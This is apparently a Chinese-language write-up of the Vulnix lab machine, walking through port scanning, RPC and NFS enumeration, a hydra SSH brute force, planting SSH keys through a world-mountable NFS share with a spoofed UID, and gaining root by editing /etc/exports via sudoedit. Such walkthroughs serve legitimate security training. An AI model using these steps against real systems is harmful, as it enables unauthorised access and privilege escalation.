Vulnx
靶机IP 192.168.1.135
kaliIP 192.168.1.128
信息收集
sudo nmap --min-rate 10000 -p- 192.168.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 10:13 CST
Nmap scan report for bogon (192.168.1.135)
Host is up (0.0018s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
79/tcp open finger
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
512/tcp open exec
513/tcp open login
514/tcp open shell
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
35745/tcp open unknown
44010/tcp open unknown
50309/tcp open unknown
55641/tcp open unknown
59567/tcp open unknown
sudo nmap -sT -sV -O -p- 192.168.1.135
Not shown: 65518 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
79/tcp open finger Linux fingerd
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
143/tcp open imap Dovecot imapd
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell?
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3s?
2049/tcp open nfs 2-4 (RPC #100003)
35745/tcp open mountd 1-3 (RPC #100005)
44010/tcp open nlockmgr 1-4 (RPC #100021)
50309/tcp open mountd 1-3 (RPC #100005)
55641/tcp open mountd 1-3 (RPC #100005)
59567/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:5E:A3:8D (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
关注点:
smtp服务(25)
简单邮件远程传输服务,可能需要pop3(110)和imap服务(143),可能存在弱口令爆破。
finger服务(79)
用于查询主机或者用户的信息
rpcbind服务(111)
远程过程调用,简单的理解是一个节点请求另一个节点提供的服务,可以进行枚举
rsh服务
linux远程连接,需要密码,可能存在爆破
rpcinfo -p 192.168.1.135
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 53781 status
100024 1 tcp 59567 status
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 2 tcp 2049 nfs_acl
100227 3 tcp 2049 nfs_acl
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 2 udp 2049 nfs_acl
100227 3 udp 2049 nfs_acl
100021 1 udp 42327 nlockmgr
100021 3 udp 42327 nlockmgr
100021 4 udp 42327 nlockmgr
100021 1 tcp 44010 nlockmgr
100021 3 tcp 44010 nlockmgr
100021 4 tcp 44010 nlockmgr
100005 1 udp 38329 mountd
100005 1 tcp 35745 mountd
100005 2 udp 42275 mountd
100005 2 tcp 55641 mountd
100005 3 udp 45218 mountd
100005 3 tcp 50309 mountd
nfs侦听2049端口的tcp服务和udp服务
showmount -e 192.168.1.135
Export list for 192.168.1.135:
/home/vulnix *
意味着可以从任何主机访问共享。因此将该共享的位置安装在本地计算机上
打开提示权限不够,应该是设置了root_squash
no_root_squash:登入 NFS 主机使用分享目录的使用者,如果是 root 的话,那么对于这个分享的目录来说,他就具有 root 的权限!这个项目『极不安全』,不建议使用!
root_squash:在登入 NFS 主机使用分享之目录的使用者如果是 root 时,那么这个使用者的权限将被压缩成为匿名使用者,通常他的 UID 与 GID 都会变成 nobody 那个系统账号的身份。
枚举smtp用户,发现root,user和vulnix账号,通过hydra只能爆破出user的密码,
ACCOUNT FOUND: [ssh] Host: 192.168.1.135 User: user Password: letmein [SUCCESS]
user:letmein
user@vulnix:~$ ls
user@vulnix:~$ whoami
user
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
没有利用的数据,无思路。
看了一下WP,思路为:
- 将靶机的/home/vulnix目录通过nfs服务挂载到本地/tmp/vulnix中
- 切换到kali的vulnix用户
- 将当前用户的ssh公钥复制到/tmp目录
- 将ssh公钥复制到远程目录中的authorized_keys文件
- 通过ssh免密登录靶机的vulnix用户
- 之后在进行提权操作
在Linux系统中,每个用户都有一个唯一的用户ID(uid)。ssh登录时,服务器端会校验连接用户的uid和authorized_keys文件所属的uid是否一致。如果不一致的话,ssh登录会失败。所以kali中vulnix用户UID必须和靶机相同。
查看vulnix用户的uid
user@vulnix:~$ cat /etc/passwd |grep bash
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
kali新建用户vulnix,设置密码,UID。
useradd -m vulnix
passwd vulnix
新的密码:
重新输入新的密码:
passwd:已成功更新密码
leafpad /etc/passwd
vulnix:x:2008:2008::/home/vulnix:/bin/bash
注: -m 生成用户的目录
挂载
mount -t nfs 192.168.1.135:/home/vulnix /tmp/mount/
切换
su vulnix
$ bash
建立公私钥对
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa):
Created directory '/home/vulnix/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/vulnix/.ssh/id_rsa
Your public key has been saved in /home/vulnix/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:2oDhnxJHWud5qTfFGW6m6w8pPEHo218RGPpYtkygZGs vulnix@kali
The key's randomart image is:
+---[RSA 3072]----+
| o . . |
| o + o o |
| . E + = o |
| . O + O = + |
| = + S * O |
| + O + * . |
| . = B * . |
| . = = |
| .+.. |
+----[SHA256]-----+
注:id_rsa私钥 id_rsa.pub公钥,需要将公钥放到在本地挂载的目录下
cp ~/.ssh/id_rsa.pub /tmp/mount/.ssh/authorized_keys
或者
cat ~/.ssh/id_rsa.pub >/tmp/mount/.ssh/authorized_keys
ssh连接
ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa vulnix@192.168.1.135 -v
注:
-i 指定私钥文件;
另 目前最新的Linux的ssh不支持ssh-dss(据说是不安全,所以不建议再ssh.configer中修改),所以临时加上参数 -o
注意密钥文件(~/.ssh/id_rsa 和 /tmp/mount/.ssh/authorized_keys )的权限.(我改为777一直上不去,卡了一天 ╮(~ ̄▽ ̄)╭ )
https://blog.csdn.net/u010694718/article/details/104804066#::text=%E9%A6%96%E5%85%88%E8%AE%BE%E7%BD%AE%2F.ssh%E7%9B%AE%E5%BD%95%E6%9D%83%E9%99%90%E4%B8%BA700%EF%BC%8C%E7%84%B6%E5%90%8E%E8%AE%BE%E7%BD%AEauthorized_keys%E6%9D%83%E9%99%90%E4%B8%BA600%E3%80%82%20cd%20%20chmod%20700%20%2F.ssh,cd%20~%2F.ssh%20chmod%20600%20authorized_keys%201
vlnix@vulnix:~$ whoami
vulnix
切换成功,开始提权。
vulnix@vulnix:/$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit
/etc/exports
打开 /etc/exports添加 /root *(rw,no_root_squash) 将靶机的root目录通过nfs共享出来
vulnix@vulnix:/etc$ sudoedit /etc/exports
sudoedit: /etc/exports unchanged
重启靶机 读取nfs配置文件
kali新建/tmp/v,将靶机root目录挂载到/tmp/v
mount -t nfs 192.168.1.135:/root /tmp/v
重新生成公私钥对,将公钥赋给靶机后通过ssh连接。
┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:84l0+6YMhIOFm2J9Bm46edZUOd0At8Caug1dx6YwaAs root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .o.o |
| . .= + |
| o..o+.o . |
| Eoo*=o..+ |
| ooB+*+S+. |
| . =+=.+.= o |
| + o+. o + |
| +. . o .. |
| oo. |
+----[SHA256]-----+
┌──(root㉿kali)-[~/.ssh]
└─# cp ~/.ssh/id_rsa.pub /tmp/v/.ssh/authorized_keys
┌──(root㉿kali)-[/tmp/v/.ssh]
└─# ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa root@192.168.1.135 -v
root@vulnix:~# whoami
root
root@vulnix:~# uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)
提权成功